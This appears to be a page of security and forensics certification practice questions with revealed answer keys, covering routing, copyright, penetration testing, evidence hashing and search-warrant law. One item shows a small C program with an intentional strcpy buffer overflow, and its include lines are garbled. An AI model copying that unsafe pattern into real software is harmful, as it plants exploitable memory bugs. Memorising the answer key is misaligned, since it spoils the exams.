A packet is sent to a router that does not have the packet destination address in its route table.

How will the packet get to its proper destination?

  • A . Root Internet servers
  • B . Border Gateway Protocol
  • C . Gateway of last resort
  • D . Reverse DNS

Reveal Solution Hide Solution

Correct Answer: C
Question #94

You are called by an author who is writing a book and he wants to know how long the copyright for his book will last after he has the book published?

  • A . 70 years
  • B . the life of the author
  • C . the life of the author plus 70 years
  • D . copyrights last forever

Reveal Solution Hide Solution

Correct Answer: C
Question #95

You work as a penetration tester for Hammond Security Consultants. You are currently working on a contract for the state government of California. Your next step is to initiate a DoS attack on their network.

Why would you want to initiate a DoS attack on a system you are testing?

  • A . Show outdated equipment so it can be replaced
  • B . List weak points on their network
  • C . Use attack as a launching point to penetrate deeper into the network
  • D . Demonstrate that no system can be protected against DoS attacks

Reveal Solution Hide Solution

Correct Answer: B
Question #96

To make sure the evidence you recover and analyze with computer forensics software can be admitted in court, you must test and validate the software.

What group is actively providing tools and creating procedures for testing and validating computer forensics software?

  • A . Computer Forensics Tools and Validation Committee (CFTVC)
  • B . Association of Computer Forensics Software Manufactures (ACFSM)
  • C . National Institute of Standards and Technology (NIST)
  • D . Society for Valid Forensics Tools and Testing (SVFTT)

Reveal Solution Hide Solution

Correct Answer: C
Question #97

You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might question whether evidence has been changed while at the lab.

What can you do to prove that the evidence is the same as it was when it first entered the lab?

  • A . make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab
  • B . make an MD5 hash of the evidence and compare it to the standard database developed by NIST
  • C . there is no reason to worry about this possible claim because state labs are certified
  • D . sign a statement attesting that the evidence is the same as it was when it entered the
    lab

Reveal Solution Hide Solution

Correct Answer: A
Question #98

The police believe that Melvin Matthew has been obtaining unauthorized access to computers belonging to numerous computer software and computer operating systems manufacturers, cellular telephone manufacturers, Internet Service Providers and Educational Institutions. They also suspect that he has been stealing, copying and misappropriating proprietary computer software belonging to the several victim companies.

What is preventing the police from breaking down the suspects door and searching his home and seizing all of his computer equipment if they have not yet obtained a warrant?

  • A . The Fourth Amendment
  • B . The USA patriot Act
  • C . The Good Samaritan Laws
  • D . The Federal Rules of Evidence

Reveal Solution Hide Solution

Correct Answer: A
Question #99

You just passed your ECSA exam and are about to start your first consulting job running security audits for a financial institution in Los Angeles. The IT manager of the company you will be working for tries to see if you remember your ECSA class. He asks about the methodology you will be using to test the company’s network.

How would you answer?

  • A . Microsoft Methodology
  • B . Google Methodology
  • C . IBM Methodology
  • D . LPT Methodology

Reveal Solution Hide Solution

Correct Answer: D
Question #100

Kyle is performing the final testing of an application he developed for the accounting department.

His last round of testing is to ensure that the program is as secure as possible. Kyle runs the following command.

What is he testing at this point?

#include #include int main(int argc, char

*argv[]) { char buffer[10]; if (argc < 2) { fprintf (stderr, "USAGE: %s stringn", argv[0]); return 1; }

strcpy(buffer, argv[1]); return 0; }

  • A . Buffer overflow
  • B . SQL injection
  • C . Format string bug
  • D . Kernal injection

Reveal Solution Hide Solution

Correct Answer: A
Exit mobile version